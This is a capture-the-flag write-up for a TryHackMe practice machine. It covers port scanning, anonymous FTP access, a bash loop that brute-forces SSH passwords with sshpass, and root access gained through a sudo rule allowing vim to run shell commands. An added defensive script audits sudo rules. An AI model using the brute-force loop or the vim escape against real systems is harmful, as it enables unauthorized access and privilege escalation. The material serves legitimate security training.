Simple CTF [EASY] Writeup - Try Hack Me

Files used in this blog are here

Port scan

First we start by scanning the ports

nmap -p- -T4 --min-rate 5000 -vvv -o fullscan

-p- means all ports; -T4 is for an aggressive scan; --min-rate 5000 tells nmap how many packets per second to send; -vvv is verbose; -o is for file output.

# Nmap 7.80 scan initiated Fri Feb 16 00:10:54 2024 as: nmap -p- -T4 --min-rate 5000 -vvv -o fullscan
Nmap scan report for (
Host is up, received syn-ack (0.27s latency).
Scanned at 2024-02-16 00:10:54 -03 for 42s
Not shown: 65532 filtered ports
Reason: 65532 no-responses
21/tcp   open  ftp          syn-ack
80/tcp   open  http         syn-ack
2222/tcp open  EtherNetIP-1 syn-ack

Read data files from: /usr/bin/../share/nmap
# Nmap done at Fri Feb 16 00:11:36 2024 -- 1 IP address (1 host up) scanned in 41.57 seconds

FTP Anonymous login

Now, since port 21 is open, we can try an anonymous login.

Connected to
220 (vsFTPd 3.0.3)
Name ( anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Now we are inside! We can verify by running a command like ls

ftp> ls
200 EPRT command successful. Consider using EPSV.
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 Aug 17  2019 pub
226 Directory send OK.

If we see a message about passive mode, just type passive and the client will switch to active mode.

If we dig inside the folder pub, there is a file called ForMitch.txt. We download it with get <file_name>

Then, on our local machine, we run cat <file_name>

We get the following content:

Dammit man... you'te the worst dev i've seen. You set the same pass for the system user, and the password is so weak... i cracked it in seconds. Gosh... what a mess!

Brute force

So we know that the password is the same one used for the system user, and that it is weak.

Since the message mentions a name, we are going to assume that the user is mitch. Now we should try to brute force the password.

I'm going to use a package called sshpass to feed ssh each password from a wordlist that I got from the internet, with a simple script like this:


for password in $(cat weak_passwords.txt); do
    echo "Trying password: $password"
    # Quote the password so special characters reach sshpass intact
    sshpass -p "$password" ssh -p 2222 -o StrictHostKeyChecking=no -o IdentitiesOnly=yes mitch@
done

After a long time trying I got the password!


Obtain the flags

If we run ls we can see that the user.txt flag is there. Take it and continue!

One of the first things to always do on a system (even before trying tools like linpeas) is a simple sudo -l to see if anything can be run with sudo.

$ sudo -l
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim

And of course there it is: we can use sudo vim.

Let's run sudo vim, then type : followed by ! ls /root and press Enter. This shows whether the root flag is there.


$ sudo vim


And there it is! Do the same as before, this time with ! cat /root/root.txt


Congratulations, you got your flag!
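
A defender's check for the sudo rule used above, as an added example that is not part of the original writeup: a shell function that reads sudo -l output and flags rules that let a user run, as another user, a program able to execute shell commands. The program list and the last two sample rules are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the original writeup): audit `sudo -l` output for
# rules that give root through a program able to run shell commands.

# Assumption: short, non-exhaustive list of programs that can spawn commands
# from inside their own interface. Extend it for your environment.
ESCAPE_BINS="vim vi view nano less more man ed awk find env"

# Reads `sudo -l` output on stdin; prints "<severity> (<runas>) <command>".
#   HIGH   = risky command allowed with NOPASSWD
#   MEDIUM = risky command, password still required
# Simplification: a NOPASSWD tag is treated as covering the whole line.
audit_sudo_rules() {
    while IFS= read -r line; do
        # Rule lines look like "    (root) NOPASSWD: /usr/bin/vim".
        case "$line" in *"("*")"*) ;; *) continue ;; esac
        runas=${line#*\(}; runas=${runas%%\)*}
        rest=${line#*\)}
        severity=MEDIUM
        case "$rest" in *NOPASSWD:*) severity=HIGH ;; esac
        # Drop tags such as "NOPASSWD:" and put one command per line.
        printf '%s\n' "$rest" | sed 's/[A-Z_]*://g' | tr ',' '\n' |
        while read -r cmd; do
            [ -n "$cmd" ] || continue
            bin=${cmd%% *}          # program path without its arguments
            name=${bin##*/}         # basename, e.g. "vim"
            case " $ESCAPE_BINS ALL " in
                *" $name "*) printf '%s (%s) %s\n' "$severity" "$runas" "$cmd" ;;
            esac
        done
    done
}

# Constructed sample: the first rule is the one shown in this writeup,
# the other two are made up to exercise the other branches.
sample_sudo_l() {
    cat <<'EOF'
User mitch may run the following commands on Machine:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/less /var/log/syslog, /bin/systemctl restart nginx
    (ALL) NOPASSWD: ALL
EOF
}

sample_sudo_l | audit_sudo_rules
```

On a real host, an administrator can pipe sudo -l -U <user> into audit_sudo_rules for each account and replace any flagged rule with a narrower one.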